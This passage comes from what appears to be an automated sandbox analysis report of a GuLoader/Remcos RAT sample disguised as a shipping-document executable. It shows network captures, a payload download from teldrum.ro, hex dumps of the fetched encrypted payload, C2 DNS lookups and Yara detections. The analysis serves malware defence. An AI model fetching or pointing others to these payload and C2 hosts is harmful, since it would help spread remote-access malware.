Jan 16, 2025 05:10:54.754364014 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.754465103 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.754708052 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.754709005 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.754739046 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.754791975 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.785681963 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.785768032 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.785864115 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.785942078 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.786484957 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.786571980 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.787131071 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.787215948 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.787281990 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.787355900 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.787869930 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.787950039 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.788572073 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.788647890 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.788681030 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.788748026 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.789333105 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.789402008 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.790577888 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.790641069 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.790839911 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.790908098 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.791430950 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.791498899 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.791790962 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.791876078 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.792037010 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.792104959 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.792395115 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.792465925 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.840620041 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.840713024 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.840838909 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.840915918 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.872313023 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.872391939 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.872946024 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.873009920 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.873074055 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.873136997 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.873204947 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.873260975 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.873656988 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.873723030 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.873749971 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.873811007 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.874181032 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.874254942 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.874510050 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.874571085 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.874667883 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.874728918 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.875530005 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.875600100 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.875619888 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.875684977 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.876077890 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.876146078 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.903824091 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.903908968 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.904139042 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.904217958 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.904730082 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.904809952 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.927458048 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.927618980 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.927755117 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.927783966 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.927783966 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.927815914 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.927841902 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.927845955 CET	443	49737	109.99.162.14	192.168.2.4
Jan 16, 2025 05:10:54.927851915 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.927897930 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.927985907 CET	49737	443	192.168.2.4	109.99.162.14
Jan 16, 2025 05:10:54.927999020 CET	443	49737	109.99.162.14	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 05:10:52.885962009 CET	51458	53	192.168.2.4	1.1.1.1
Jan 16, 2025 05:10:52.962611914 CET	53	51458	1.1.1.1	192.168.2.4
Jan 16, 2025 05:10:56.883433104 CET	57030	53	192.168.2.4	1.1.1.1
Jan 16, 2025 05:10:56.892093897 CET	53	57030	1.1.1.1	192.168.2.4
Jan 16, 2025 05:10:56.894604921 CET	64114	53	192.168.2.4	1.1.1.1
Jan 16, 2025 05:10:56.902887106 CET	53	64114	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 16, 2025 05:10:52.885962009 CET	192.168.2.4	1.1.1.1	0x1aa9	Standard query (0)	teldrum.ro	A (IP address)	IN (0x0001)	false
Jan 16, 2025 05:10:56.883433104 CET	192.168.2.4	1.1.1.1	0xc62e	Standard query (0)	linktreewealth.zapto.org	A (IP address)	IN (0x0001)	false
Jan 16, 2025 05:10:56.894604921 CET	192.168.2.4	1.1.1.1	0x6be3	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 05:10:52.962611914 CET	1.1.1.1	192.168.2.4	0x1aa9	No error (0)	teldrum.ro	109.99.162.14	A (IP address)	IN (0x0001)	false
Jan 16, 2025 05:10:56.892093897 CET	1.1.1.1	192.168.2.4	0xc62e	No error (0)	linktreewealth.zapto.org	0.0.0.0	A (IP address)	IN (0x0001)	false
Jan 16, 2025 05:10:56.902887106 CET	1.1.1.1	192.168.2.4	0x6be3	No error (0)	linktreewealthy.zapto.org	0.0.0.0	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

teldrum.ro

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	109.99.162.14	443	7700	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 04:10:54 UTC	173	OUT	GET /NJrdZqNcCtz102.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: teldrum.ro Cache-Control: no-cache
2025-01-16 04:10:54 UTC	223	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 04:10:54 GMT Server: Apache Last-Modified: Mon, 13 Jan 2025 20:36:39 GMT Accept-Ranges: bytes Content-Length: 493632 Connection: close Content-Type: application/octet-stream
2025-01-16 04:10:54 UTC	7969	IN	Data Raw: 7c cd 41 88 f3 aa b9 07 43 9f e2 63 1a 47 c0 99 31 f6 fb dd 98 80 55 65 a7 3c 37 0d 1d c9 47 fe 3b 7b 83 83 8b 95 f6 6d 84 04 cf 6b 56 6c 14 ef e6 62 6a 1b 24 de 29 fd 65 9d da 35 73 99 e0 3b e3 64 d9 d6 0b 86 83 14 68 d8 e0 b2 71 08 bb eb 3f b2 62 d1 c7 75 5f 29 f3 08 48 8e 63 dd b2 49 43 5d 51 bf b9 8a 67 bc bc 96 79 ae f3 18 ed fb c1 77 64 3d 94 2f ed 87 5d 08 71 1e ac 12 a9 4f 7e f6 2b bc 12 74 fb 4f d2 b0 1b 55 d7 e6 5a 1b ee ab 6e 5a bf 78 48 59 e7 8c b6 10 26 c5 e7 f3 13 33 03 d8 c0 69 ac 98 f1 0c 97 0f 65 30 a8 48 cf 5a f1 85 13 86 2b 0e 4c 0b 2a f8 12 3d cd 6d d1 d5 8e 28 37 d4 0c 7a 57 8e 4f 0f 20 d0 03 36 e7 ef 39 b3 65 fb 8e eb 51 8b 00 6c e4 24 1e 3b e1 f0 e7 99 2f 1f 74 43 d5 8d 49 43 6a 86 fa 0d 53 43 da 6a 0d 59 35 99 86 b3 4c 7d 52 02 d1 Data Ascii: \|ACcG1Ue<7G;{mkVlbj$)e5s;dhq?bu_)HcIC]Qgywd=/]qO~+tOUZnZxHY&3ie0HZ+L*=m(7zWO 69eQl$;/tCICjSCjY5L}R
2025-01-16 04:10:54 UTC	8000	IN	Data Raw: 14 7f ba 45 09 92 32 0f ea 33 6d d8 1a 88 94 cd 80 d9 de 78 1c 70 47 04 b3 85 ac 5c c4 03 ff 34 19 85 30 5a 54 a9 fc 6f f4 f5 4e 6c ab c8 ed 80 c3 51 93 da 8f 94 b5 96 ef 0d 3c 87 f0 60 c8 d0 72 ed 77 b1 ba 93 a2 bd a9 e7 c4 16 88 34 03 a0 68 16 25 bd 91 6a 01 6b ce d5 68 fa 35 f0 34 47 02 c0 86 37 e3 db 86 a7 f6 1b ea 4c 22 e1 9c ec dc 2f 0b 5c db fe 86 9c a2 3f 12 ec 92 13 7c 9d 90 4a 66 cd 42 d6 99 ca 08 a1 bd 46 6d 96 6e 7b 1d 6e 6f 92 22 af 5d 14 fc 39 99 cd 0d 7a a1 3e db 3d 2d e6 9d a0 aa 53 e8 7f 27 06 79 35 41 35 6d b3 49 68 8c 71 17 2f 03 99 00 3a c3 94 18 70 b8 f2 d5 33 13 bd 41 77 71 f9 37 31 ac 06 9c 5b 65 1c 03 7b fd 5d aa 1b db 42 96 69 e1 81 f8 e2 75 ec 13 a3 cb 8a 04 1a 10 d8 55 03 e9 f8 eb 66 56 7b f5 da cd 49 08 03 4c d6 ff cc c6 31 ca Data Ascii: E23mxpG\40ZToNlQ<`rw4h%jkh54G7L"/\?\|JfBFmn{no"]9z>=-S'y5A5mIhq/:p3Awq71[e{]BiuUfV{IL1
2025-01-16 04:10:54 UTC	8000	IN	Data Raw: 1d 99 73 43 23 e8 b2 91 f3 06 0d a9 1d 75 98 f2 f3 8c 70 3a 7b 6b ef b1 8a e6 f5 13 19 7c b8 59 2d 4e 0c 0d d7 06 be 96 e0 6c 06 51 10 83 80 75 2c a1 13 99 ef 74 59 fb 19 54 8c d2 c1 15 c5 93 b3 b2 85 88 d2 fc bf 72 e5 bb 88 20 3a e4 b7 d6 00 91 c5 d9 7d 6f 91 1a 7f dd 13 84 10 2a 40 be 17 88 53 a7 f7 a2 b6 0e 28 cd c9 e7 d6 df 0c 29 2d 01 49 e3 c1 eb 6d 4c 9d 70 41 c5 64 eb b1 45 23 fc 63 49 c9 84 44 9a 92 d0 0d 51 ed 19 11 e6 c2 80 89 4d f9 bb 50 c4 19 66 92 aa e8 e2 87 2b 1a 4b f7 92 6d 70 f3 5d 91 89 33 22 10 24 55 c3 70 f3 9a c5 b7 fd c1 a9 49 6b f8 d0 db bd d4 36 45 f6 5f db 79 8d ca aa 9c a4 27 9e 85 97 63 f9 8b 23 7a 00 8d fe 2d 22 33 e8 26 d1 9f 4b ec f4 ce 5b c8 a3 d1 64 3e 65 4e f7 7a 30 22 f8 20 fd e6 7e 33 85 54 c9 df 40 16 5e 1c 2a ec 15 64 Data Ascii: sC#up:{k\|Y-NlQu,tYTr :}o@S()-ImLpAdE#cIDQMPf+Kmp]3"$UpIk6E_y'c#z-"3&K[d>eNz0" ~3T@^d
2025-01-16 04:10:54 UTC	8000	IN	Data Raw: e3 20 b1 06 5b 94 71 65 e9 ba 28 b3 50 80 36 e6 26 4b b4 36 a0 ab 64 ff 63 32 8e d4 61 bc b7 dd 4f 9d 09 da 48 ea 83 1b 49 74 33 ad 32 6b 05 69 b1 61 8c 07 ba 74 57 ff 19 5d 5b f0 bc 27 06 89 42 d9 e2 88 b0 eb 05 36 57 d5 0e fe 56 b7 d3 86 2c ef 87 bc 5a 1b ac be 8b 44 1f ae 0d 28 7a fe de 66 1c 85 65 92 9b 86 a0 9c f9 7d 2b 42 b0 d8 f1 d8 30 bb d6 a8 98 05 5e 39 f4 e0 e5 25 7f d8 e4 c4 82 3a b5 64 81 35 78 85 d6 c6 d1 0b 74 4c 0b 26 6e 51 03 2a f0 f7 2b 8d 80 7f 0b 24 ff 65 7c 37 d9 7a c1 b0 4b 1c 69 4d 0f 92 3c c5 c7 71 f9 fe fa d5 5d b2 65 33 7c 50 74 61 78 51 6f db f3 5b 2d 1b 2e e5 13 67 71 c7 72 80 f6 c4 36 aa 40 dd d2 35 80 a9 ec fd dd e8 94 93 c3 32 bf 77 c3 e6 af df d7 e0 74 6f ef 9c d1 1c c7 8d 02 3b 6b 28 22 41 19 25 cb 6b aa e4 28 4e 27 64 a1 Data Ascii: [qe(P6&K6dc2aOHIt32kiatW]['B6WV,ZD(zfe}+B0^9%:d5xtL&nQ*+$e\|7zKiM<q]e3\|PtaxQo[-.gqr6@52wto;k("A%k(N'd
2025-01-16 04:10:54 UTC	8000	IN	Data Raw: 7f 8d df 74 cd 00 10 39 15 3c 84 c7 84 9c 29 2b 11 22 45 b2 31 27 5f 50 be 5b 34 ef 2b dc be 71 9a e5 60 bf b3 2c 9b 42 9f 6c 58 03 a8 89 65 22 b0 b9 a3 f9 29 f7 93 6c bb 4d 57 b2 09 d6 9e 99 aa e4 ba e5 30 55 99 4e d8 84 28 7f d0 6d 53 c5 b5 18 e7 c7 67 fa 38 fb dd 6d 03 6d 18 ba fe 2b 42 14 24 60 9e 1e ed a2 c6 82 2d 21 22 0b e9 65 b3 30 55 0b 23 72 ed 23 ba f7 be c1 7c 4b 91 dd 2f 5c ec 66 cc 00 ee c2 22 48 70 5f e1 0b 7f 9b 1d f9 ba 1b a4 a2 f6 cc 26 9d 4e 04 fd 30 91 bc bc 20 d6 f7 e8 69 b1 a5 a3 2d d5 62 0c 7b d7 74 a9 b6 36 35 37 6f 15 7d e0 9e 3c 09 bd 6a 5c 16 15 1f e4 25 ee 4e 4c 39 62 06 3d 40 ac 9e 66 9a 75 bf b9 a4 9c a9 19 f1 9d 30 b8 69 a7 79 ae 14 f8 72 1b 49 a7 94 0e 3d a1 78 f6 75 ec 65 ae 79 4d 19 f3 6c c0 f2 b7 a8 2d 93 b4 c6 b8 f8 09 Data Ascii: t9<)+"E1'_P[4+q`,BlXe")lMW0UN(mSg8mm+B$`-!"e0U#r#\|K/\f"Hp_&N0 i-b{t657o}<j\%NL9b=@fu0iyrI=xueyMl-
2025-01-16 04:10:54 UTC	8000	IN	Data Raw: 56 98 2e 6e 4e b8 92 f3 84 a4 48 f2 82 26 98 03 e0 19 59 53 59 0e 60 85 86 7f b2 d6 f2 3b 40 28 65 7a b5 15 bf 06 d9 09 a2 8b 2d 09 68 ea cb 01 ed 5a 40 f2 4b 75 b2 da e7 a4 ec a3 35 46 65 ba df d9 75 0e 75 9f ae b3 04 3e e0 3c f5 eb 93 5b 0c aa 05 3b ec 03 ac c5 9d 2e 44 99 47 a2 7f 60 1c ea 25 dd 5a 55 34 a2 ae 57 fb 8a 66 bc 3f 52 49 68 b5 51 ed 7b bf 3d 64 48 84 ac d3 87 29 03 8e 28 5b 06 39 cc 35 e9 12 94 12 70 f3 69 f1 3a da 46 44 0e cd 26 0c 34 cd c6 8d 41 78 a6 c3 11 1d 8a 17 54 9c 40 e5 56 61 30 a5 13 63 ee bd 23 f9 47 a5 14 bd 68 f2 b8 d8 20 d5 b6 2e 04 68 52 a1 28 9f 70 15 85 09 7c c6 73 d6 cc 58 c0 e7 2e f5 8d 67 67 57 8c 33 d3 47 31 31 4c da 51 9d b7 64 ee 08 93 4a 81 e5 cc e7 14 76 a8 20 b0 21 d9 14 b4 d3 9e cb 38 74 a8 c4 c4 b8 a6 a1 92 e7 Data Ascii: V.nNH&YSY`;@(ez-hZ@Ku5Feuu><[;.DG`%ZU4Wf?RIhQ{=dH)([95pi:FD&4AxT@Va0c#Gh .hR(p\|sX.ggW3G11LQdJv !8t
2025-01-16 04:10:54 UTC	8000	IN	Data Raw: c5 05 3d 3b 77 e5 ab 9e 85 41 f4 35 46 ad 80 5c 27 0e c9 07 23 34 d6 b7 63 95 67 b7 b1 91 3f ef 7f ff cb 91 cc e4 9f dc 99 d7 c1 38 2f 5d 2a bc d0 a6 36 8c c2 53 d6 e4 fd 32 28 c6 b5 16 a9 a9 af af 84 b6 2b 70 3f 39 4b 99 c8 1a 72 f2 a7 7d c0 2e 7a 25 3a 7f 15 24 29 b5 7a cc 75 93 8b 16 07 bd 44 23 f9 55 ef 22 11 ca 38 32 a2 2a b7 9b 31 60 5d 3d c2 a1 e5 1d 1a 72 e6 8f 6b b6 17 e3 0c 31 da c2 ce e6 29 31 2f f6 39 40 be 92 f9 5d d6 27 a0 a4 47 45 ee b2 a4 b4 3c da 8e 6b 66 82 9e a1 4e f9 21 0a a5 83 01 9a ae 53 aa 21 88 99 c7 ad 98 ac 1a a8 3f cb 04 64 c9 ea 4a 2e 85 34 36 31 8e a8 c9 8d 17 dc ec 67 fd c5 03 e0 7b 1c dd 69 77 26 2c 62 16 be 68 03 32 b8 17 a7 14 ff 07 74 04 77 63 a0 30 ab 42 6f 33 6a 33 44 c8 b1 d6 c7 3c 84 a8 4f 83 03 ca 4d 57 24 58 92 6f Data Ascii: =;wA5F\'#4cg?8/]6S2(+p?9Kr}.z%:$)zuD#U"821`]=rk1)1/9@]'GE<kfN!S!?dJ.461g{iw&,bh2twc0Bo3j3D<OMW$Xo
2025-01-16 04:10:54 UTC	8000	IN	Data Raw: e6 b7 0d 40 8b 1e d8 64 6c d9 a2 d6 72 bd 50 85 29 57 23 a8 f7 4d 56 51 67 ff 06 88 a0 83 5f 65 f0 f8 fa 19 6a fb f3 9b 97 b5 30 da e0 34 bc 86 43 62 50 0d 98 a4 49 5b e4 ac 8d 19 a9 79 5b d7 09 ec f8 3c 05 93 f3 33 1b 7f f3 4d 11 6d 44 c1 12 f1 00 a2 90 41 4d 0c 00 49 0b d7 d2 54 b6 d8 7e 71 83 65 e9 42 89 b6 8c 9c 5d 40 66 6c 12 8c 8d 8e 16 05 fb 7d 5e 9f 0b 78 32 92 17 d2 f5 44 0f b2 71 1f 1d 71 e1 85 2c 23 4e 49 f3 84 c6 28 da 50 62 49 97 8e 70 74 fd d8 09 df 66 6c 07 4a b4 80 fb af 92 85 9a 18 f7 df b0 81 fc f9 6a 4f 30 57 43 36 a6 ab 93 39 15 7a 89 87 76 e8 aa d4 76 0e 3b 96 3c c0 0b d9 14 94 a3 3b e0 e4 57 08 08 87 9a 35 bb ef 80 5c f5 53 6c d5 8b ed 80 cb 58 38 c2 4e 69 40 69 7a 80 8d 93 d5 a6 a9 c8 ef 33 34 b5 1a 3f 37 41 ad e6 1c bd f0 1f 79 73 Data Ascii: @dlrP)W#MVQg_ej04CbPI[y[<3MmDAMIT~qeB]@fl}^x2Dqq,#NI(PbIptflJjO0WC69zvv;<;W5\SlX8Ni@iz34?7Ays
2025-01-16 04:10:54 UTC	8000	IN	Data Raw: f1 54 97 8d 24 06 d5 1c 60 45 f2 66 ee 49 f5 64 db 33 93 03 7c 25 b1 59 98 b4 3a 26 56 a6 3f 9a 3a f3 1e aa 4f 76 dc 87 e4 c3 ad a4 ac 05 aa 86 e2 cc a1 f0 20 3b a0 98 c5 02 25 21 8b ef 0b 50 d7 91 c9 a3 83 22 a9 02 f8 d5 97 17 85 0e 0b 0d 5b b9 d2 3c 9c c3 14 19 72 39 c9 6c 32 67 99 d7 91 5b f7 19 31 65 53 93 68 02 d2 b6 94 3a b2 be c1 9e 1a 72 0b d8 29 4d 2e 6a 6c 54 cf ac ba 5d 65 d6 fc 9d 9d 74 4a e4 c7 7f 57 29 f4 1f 13 1d 21 7c c0 f2 0b d0 0c 50 74 f1 73 e3 68 3b fa bf 33 bc 89 58 6f 66 fc 64 d7 f7 93 05 2e e3 99 8e 4a 3e 67 ac c4 b0 0b 40 dd a0 0d 80 91 8f 8a 2d 76 a3 e1 70 4f f7 60 c9 da 5c ab 46 56 c5 19 4b e8 bf 17 15 02 ca 24 b7 0b f3 ca 82 bf 7c 5d 51 1b ec 97 41 93 23 6d 3e ad 24 c7 89 6c 29 6f 14 88 4f ab 52 43 39 43 18 5f 0a 65 3a 54 9b 01 Data Ascii: T$`EfId3\|%Y:&V?:Ov ;%!P"[<r9l2g[1eSh:r)M.jlT]etJW)!\|Ptsh;3Xofd.J>g@-vpO`\FVK$\|]QA#m>$l)oORC9C_e:T
2025-01-16 04:10:54 UTC	8000	IN	Data Raw: bf e7 84 d7 32 13 db 41 22 ad 47 26 44 8c 21 ed 4a 2c 45 f5 71 bd 43 2d 7b 48 ee 56 66 a4 d5 90 28 1c 67 4f d9 97 f5 42 bc 53 91 8c c2 2f 4b a2 4e 56 7e fa ed 5a 96 e2 ae bc 7d f0 05 da 70 56 16 24 62 97 53 fe 59 81 59 89 28 52 bb 45 d7 f1 e1 e1 e3 86 37 c1 e5 ba 67 dc f5 f3 8f 43 64 ba 53 c3 82 7f 3c 48 a9 3c 8e c6 cf 91 ec 56 cc 2b df 1d 7b cf f4 5d ed 69 8a 92 90 17 0b 0b 32 2a 27 b1 d8 6d 12 5a d9 15 89 7f 83 d9 45 5a 5b 13 f6 dc 7a dc 68 3f 51 40 b5 42 4e 8c 5e 55 74 a6 75 99 ac 9f 86 f8 e8 01 e2 5b a1 94 97 df 3f 01 8a 32 53 5f ad 32 3d 88 de 65 c5 ea ff 6b 4b e2 a4 dc 2f f9 f0 6b 23 a3 a3 b7 58 65 98 8e 2a 09 b6 89 cf 20 6b 2a 28 67 ca be 5d 35 c4 71 cc 55 15 72 f3 ea 11 e1 c0 ef 91 a8 46 11 b0 17 b8 84 9c 5b 7f 96 50 8e 2e 4a 74 a1 81 98 67 be 56 Data Ascii: 2A"G&D!J,EqC-{HVf(gOBS/KNV~Z}pV$bSYY(RE7gCdS<H<V+{]i2'mZEZ[zh?Q@BN^Utu[?2S_2=ekK/k#Xe k*(g]5qUrF[P.JtgV

Analysis Process: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exePID: 7332, Parent PID: 2580

General

Target ID:	0
Start time:	23:10:03
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"
Imagebase:	0x400000
File size:	610'289 bytes
MD5 hash:	DD009056ED546D7CB3B75EF74F748CED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.2125848795.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.2125582739.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2125848795.000000000316C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exePID: 7700, Parent PID: 7332

General

Target ID:	4
Start time:	23:10:42
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"
Imagebase:	0x400000
File size:	610'289 bytes
MD5 hash:	DD009056ED546D7CB3B75EF74F748CED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2983718490.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2983718490.00000000016FC000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exePID: 7332, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	15.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.9%
Total number of Nodes:	1608
Total number of Limit Nodes:	35

Executed Functions

Function 00403645 Relevance: 88.0, APIs: 32, Strings: 18, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403668
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
OleInitialize.OLE32(00000000), ref: 00403783
SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",00000020,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403945
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
